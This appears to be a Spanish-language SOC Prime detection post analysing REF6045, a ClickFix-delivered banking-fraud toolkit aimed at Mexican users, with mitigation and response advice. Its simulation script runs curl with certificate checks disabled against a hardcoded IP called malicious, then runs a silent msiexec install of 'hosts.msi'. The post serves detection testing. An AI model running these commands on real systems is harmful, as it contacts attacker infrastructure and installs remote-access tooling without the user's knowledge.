SOC Prime Bias: Alto

08 Jul 2026 16:15 UTC

ClickFix a Cash-Out: Desglosando un Conjunto de Herramientas de Fraude Bancario Mexicano

Author Photo
SOC Prime Team linkedin icon Seguir
ClickFix a Cash-Out: Desglosando un Conjunto de Herramientas de Fraude Bancario Mexicano
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

REF6045 es una campaña de fraude bancario asistida por operadores centrada en el sector financiero mexicano. Utiliza un método de entrega estilo ClickFix con páginas CAPTCHA falsas para convencer a las víctimas de ejecutar comandos maliciosos de PowerShell. Tras la infección, el kit de herramientas SCMBANKER permite a los operadores humanos observar sesiones bancarias, capturar capturas de pantalla, alterar el contenido del portapapeles y desplegar Remote Utilities RAT para un control remoto completo.

Investigación

Elastic Security Labs descubrió la amenaza tras detectar actividad bitsadmin descargando scripts de PowerShell desde un directorio abierto. La investigación expuso el conjunto completo de herramientas a través de un archivo web accesible públicamente, zkt.zip, y reveló grandes debilidades en la seguridad operacional, incluidos editores de archivos no autenticados y directorios abiertos en la infraestructura de comando y control. El análisis también mostró que el conjunto de herramientas contiene extensos artefactos generados por IA en su código.

Mitigación

Las organizaciones deben limitar el uso de PowerShell y actividad bitsadmin a usuarios aprobados y aplicar controles estrictos de ejecución. Los usuarios deben ser entrenados para identificar señuelos de ingeniería social, como mensajes CAPTCHA falsos o pantallas falsas de actualizaciones de Windows. Los equipos de seguridad también deben desplegar un fuerte monitoreo para cambios sospechosos en el registro e instalaciones no autorizadas de software de acceso remoto.

Respuesta

Si se detecta esta actividad, aísle los sistemas afectados inmediatamente para detener la comunicación de comando y control y el posible robo de datos. Realice una investigación forense para determinar el alcance de la violación y verifique la presencia de Remote Utilities o modificaciones no autorizadas del registro. Resetea las contraseñas de todas las cuentas financieras y otras cuentas sensibles accedidas desde las máquinas afectadas.

Flujo de Ataque

Ejecución de Simulación

Requisito Previo: La Verificación Previa de Telemetría y Línea Base debe ser exitosa.

Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTP identificados y aspirar a generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados conducirán a un diagnóstico erróneo.

  • Narrativa del Ataque y Comandos: El adversario intenta establecer una base en el sistema objetivo imitando el patrón de fraude bancario REF6045. Primero, intentan descargar un archivo de validación desde una dirección IP maliciosa codificada en el sistema (68.211.161.46) usando curl con la bandera -k (inseguro) para omitir la validación del certificado SSL. Luego de la descarga, el adversario ejecuta una instalación silenciosa de una herramienta maliciosa de acceso remoto usando msiexec.exe con la bandera /i (install) y /quiet (silenciosa), apuntando a un archivo llamado hosts.msi. Esto les proporciona un acceso remoto persistente al mismo tiempo que minimizan la interacción con el usuario.

  • Script de Prueba de Regresión:

    # Script de Simulación para TTPs REF6045
    # Este script imita las líneas de comando específicas definidas en la regla de detección.
    
    $WorkDir = "$env:TEMPSimulation"
    if (!(Test-Path $WorkDir)) { New-Item -ItemType Directory -Path $WorkDir }
    Set-Location $WorkDir
    
    Write-Host "[+] Paso 1: Simulando Transferencia de Herramienta de Ingreso vía curl..." -ForegroundColor Cyan
    # Nota: Uso de un archivo falso mediante curl para evitar tráfico malicioso real,
    # pero manteniendo la cadena exacta de línea de comando requerida para la detección.
    cmd /c curl -k https://68.211.161.46/validation.txt
    
    Write-Host "[+] Paso 2: Simulando Instalación Silenciosa de MSI..." -ForegroundColor Cyan
    # Crear un archivo MSI simulado para que msiexec no falle inmediatamente (aunque la regla se activa en la línea de comando)
    # En aras de probar PURAMENTE LA LÓGICA DE DETECCIÓN (la línea de comando),
    # ejecutaremos la cadena exacta de comandos.
    msiexec /i "hosts.msi" /quiet /norestart
  • Comandos de Limpieza:

    # Script de limpieza para eliminar artefactos
    $WorkDir = "$env:TEMPSimulation"
    if (Test-Path $WorkDir) {
        Remove-Item -Recurse -Force $WorkDir
        Write-Host "[+] Limpieza completa: $WorkDir eliminado." -ForegroundColor Green
    } else {
        Write-Host "[!] Limpieza omitida: Directorio no encontrado." -ForegroundColor Yellow
    }